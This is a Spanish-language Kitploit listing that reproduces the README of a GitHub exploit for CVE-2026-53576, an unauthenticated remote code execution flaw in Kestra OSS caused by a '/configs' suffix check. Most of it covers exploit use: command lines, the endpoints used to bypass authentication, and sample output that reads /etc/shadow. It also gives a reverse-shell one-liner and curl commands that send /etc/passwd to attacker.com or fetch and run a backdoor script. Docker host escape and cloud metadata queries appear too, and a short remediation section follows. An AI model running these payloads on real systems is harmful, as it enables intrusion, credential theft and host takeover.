Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-53576 — Kestra Unauthenticated RCE Exploit (CVE-2026-53576) | Kitploit
Herramientas/GitHubGitHub/tamatahyt/cve-2026-53576
Authentication & AuthorizationPrivilege EscalationExploitationWeb Application ExploitationData ExfiltrationPost-ExploitationPenetration TestingRed TeamingPayload DevelopmentContainer Escape
GitHubtamatahyt/cve-2026-53576
hace 19 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-53576

Kestra Unauthenticated RCE Exploit (CVE-2026-53576)

Ver Repositorio

Exploit de RCE no autenticado en Kestra (CVE-2026-53576)

Python License Security Kestra

Omisión crítica de autenticación que permite la ejecución remota de código sin autenticación

Exploit • Detalles de la Vulnerabilidad • Impacto • Remediación


⚠️ AVISO LEGAL

Esta herramienta es solo para fines educativos y de pruebas de seguridad autorizadas.

  • NO la uses contra sistemas que no sean de tu propiedad o para los que no tengas permiso explícito por escrito para realizar pruebas.
  • NO la uses para actividades ilegales.
  • El autor NO es responsable de cualquier uso indebido de esta herramienta.
  • Úsala bajo tu PROPIO RIESGO.

📋 Tabla de Contenidos

  • Resumen
  • Detalles de la Vulnerabilidad
  • Uso del Exploit
  • Instalación
  • Ejemplos
  • Impacto
  • Remediación
  • Cronología
  • Referencias
  • Licencia

🔍 Resumen

CVE-2026-53576 es una vulnerabilidad crítica en las versiones de Kestra OSS hasta la v1.3.20 que permite la ejecución remota de código sin autenticación mediante una omisión del filtro de autenticación.

Detalles Clave


🚨 Detalles de la Vulnerabilidad

Causa Raíz

El filtro de autenticación en Kestra contiene un fallo lógico crítico:

root@kitploit:~
// Vulnerable code in AuthenticationFilter.java:53
boolean isConfigEndpoint = request.getPath().endsWith("/configs")

Esta comprobación verifica si cualquier solicitud de API termina en /configs, en lugar de comparar la ruta exacta. Esto permite a los atacantes omitir la autenticación añadiendo /configs a cualquier endpoint.

Pasos de Explotación

  1. Crear un flujo malicioso → POST /api/v1/main/flows/configs (omite la autenticación)
  2. Desencadenar la ejecución → POST /api/v1/main/executions/configs/configs (omite la autenticación)
  3. Los comandos se ejecutan como root → Compromiso total del sistema

Endpoints Vulnerables

root@kitploit:~
# Any path ending in /configs bypasses authentication
/api/v1/main/flows/configs          # Create flows
/api/v1/main/executions/configs/configs  # Execute flows
/api/v1/{tenant}/flows/configs      # Any tenant
/api/v1/{tenant}/executions/configs/configs  # Any tenant

💻 Uso del Exploit

Uso Básico

root@kitploit:~
python3 kestra_exploit.py <target_ip>

Uso Avanzado

root@kitploit:~
# Custom port
python3 kestra_exploit.py 192.168.1.100 -p 8080

# HTTPS
python3 kestra_exploit.py 192.168.1.100 --https

# Custom command
python3 kestra_exploit.py 192.168.1.100 -c "whoami && hostname"

# Check Docker socket access
python3 kestra_exploit.py 192.168.1.100 --docker-check

# Clean up after exploitation
python3 kestra_exploit.py 192.168.1.100 --cleanup

# Full attack with all options
python3 kestra_exploit.py 192.168.1.100 -p 8080 --docker-check --cleanup -c "id > /tmp/proof.txt"

Opciones del Comando


📦 Instalación

Requisitos

root@kitploit:~
pip install requests

Clonar el Repositorio

root@kitploit:~
git clone https://github.com/yourusername/CVE-2026-53576
cd CVE-2026-53576

Verificar la Instalación

root@kitploit:~
python3 kestra_exploit.py --help

🎯 Ejemplos

Ejemplo 1: Explotación Básica

root@kitploit:~
python3 kestra_exploit.py 192.168.1.100

Salida:

root@kitploit:~
============================================================
Kestra Unauthenticated RCE Exploit
Security Research Tool - Authorized Use Only!
============================================================
[*] Target: 192.168.1.100:8080
[*] Protocol: http
============================================================

[Step 1] Creating malicious flow...
[*] Creating malicious flow at http://192.168.1.100:8080/api/v1/main/flows/configs
[*] Command: id > /tmp/proof.txt; cat /etc/shadow | head -1 >> /tmp/proof.txt
[+] Flow created successfully! (Status: 200)
[+] Flow revision: 26

[Step 2] Triggering execution...
[*] Triggering execution at http://192.168.1.100:8080/api/v1/main/executions/configs/configs
[+] Execution triggered successfully!
[+] Execution ID: 4nxNTHPk2WInfrnxQa6KF2
[+] Status: CREATED

[Step 3] Checking execution status...
[+] Execution status: SUCCESS
[*] Final status: SUCCESS

[+] Exploitation complete!
[*] To verify the attack succeeded, check the target system for:
    - /tmp/proof.txt containing command output
    - Kestra UI execution logs
    - Web UI: http://192.168.1.100:8080/ui/

Ejemplo 2: Shell Inversa

root@kitploit:~
python3 kestra_exploit.py 192.168.1.100 -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

Ejemplo 3: Exfiltración de Datos

root@kitploit:~
python3 kestra_exploit.py 192.168.1.100 -c "curl -X POST http://attacker.com/exfil -d @/etc/passwd"

Ejemplo 4: Comprobación de Escape de Docker

root@kitploit:~
python3 kestra_exploit.py 192.168.1.100 --docker-check --cleanup

💥 Impacto

Impacto Directo

Capacidades de Ataque

Un atacante no autenticado puede:

  1. Ejecutar comandos arbitrarios como root:

    root@kitploit:~
    # Read secrets
    cat /app/conf/application.yml
    
    # Reverse shell
    bash -i >& /dev/tcp/attacker.com/4444 0>&1
    
    # Install malware
    curl http://attacker.com/backdoor.sh | bash
    
  2. Realizar pivoting al sistema host (si el socket de Docker está montado):

    root@kitploit:~
    docker run -v /:/host --privileged alpine chroot /host
    
  3. Acceder a los metadatos de la nube (si se encuentra en un proveedor de nube):

    root@kitploit:~
    curl http://169.254.169.254/latest/meta-data/
    

🛡️ Remediación

Acciones Inmediatas

  1. Apagar las instancias vulnerables:

    root@kitploit:~
    sudo systemctl stop kestra
    
  2. Bloquear el acceso público:

    root@kitploit:~
    iptables -A INPUT -p tcp --dport 8080 -j DROP
    
  3. Aplicar reglas de firewall:

    • Restringir a redes internas
    • Usar VPN para el acceso administrativo

Solución Permanente

  1. Actualizar Kestra a la última versión parcheada:

    • Monitorizar: https://github.com/kestra-io/kestra
    • Consultar: https://github.com/kestra-io/kestra/security/advisories/GHSA-2q47-568g-9h4f
  2. Implementar una autenticación adecuada:

    • Usar OAuth2/OIDC en lugar de autenticación básica
    • Habilitar la autenticación multifactor
  3. Endurecimiento del contenedor:

    • Ejecutar como usuario no root
    • No montar /var/run/docker.sock
    • Usar un sistema de archivos raíz de solo lectura
  4. Endurecimiento de la red:

    • Usar una puerta de enlace API con enrutamiento adecuado
    • Implementar reglas WAF
    • Habilitar la validación de solicitudes

📅 Cronología

FechaEvento
2026-05-26Vulnerabilidad descubierta
2026-06-03Aviso de seguridad de Kestra publicado
2026-06-10

📚 Referencias

  • Aviso de seguridad de Kestra GHSA-2q47-568g-9h4f
  • Huawei PSIRT
  • Detalles de CVE-2026-53576
  • OWASP Top 10 - Control de Acceso Roto

📄 Licencia

root@kitploit:~
MIT License

Copyright (c) 2026 Security Researcher

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

⭐ Soporte

Si encuentras útil esta herramienta:

  • ⭐ Marca el repositorio con una estrella
  • 🐛 Reporta errores
  • 🔄 Envía pull requests
  • 📢 Comparte con responsabilidad

🙏 Agradecimientos

  • Al equipo de Kestra por su aviso de seguridad
  • A los investigadores de seguridad que divulgaron esta vulnerabilidad
  • A la comunidad de seguridad de código abierto

⚠️ ÚSALA RESPONSABLEMENTE ⚠️

Reportar Vulnerabilidad • Política de Seguridad • Contacto

Descargar herramienta
AtributoValor
ID de CVECVE-2026-53576
GravedadCrítica (CVSS 9.8)
Tipo de VulnerabilidadOmisión de autenticación + RCE
Producto AfectadoKestra OSS
Versiones Afectadas≤ v1.3.20
Vector de AtaqueRed
Autenticación RequeridaNinguna
Interacción del UsuarioNinguna
OpciónDescripción
targetDirección IP u hostname del objetivo (obligatorio)
-p, --portPuerto (por defecto: 8080)
--httpsUsar HTTPS en lugar de HTTP
-c, --commandComando personalizado a ejecutar
--docker-checkComprobar el acceso al socket de Docker
--cleanupEliminar el flujo después de la explotación
--delayRetardo entre solicitudes (por defecto: 2s)
CategoríaGravedadDescripción
Confidencialidad⚠️ CríticaLeer cualquier archivo (contraseñas, secretos, configuraciones)
Integridad⚠️ CríticaCrear/modificar/eliminar flujos y datos
Disponibilidad⚠️ AltaApagar el sistema, agotamiento de recursos
Autenticación⚠️ CríticaOmisión total de Basic-Auth
Escalada de Privilegios⚠️ CríticaLos comandos se ejecutan como root (uid=0)
Escape del Contenedor⚠️ CríticaCompromiso del host a través del socket de Docker
CVE-2026-53576 asignado
2026-06-15Divulgación pública
2026-08-01PoC publicado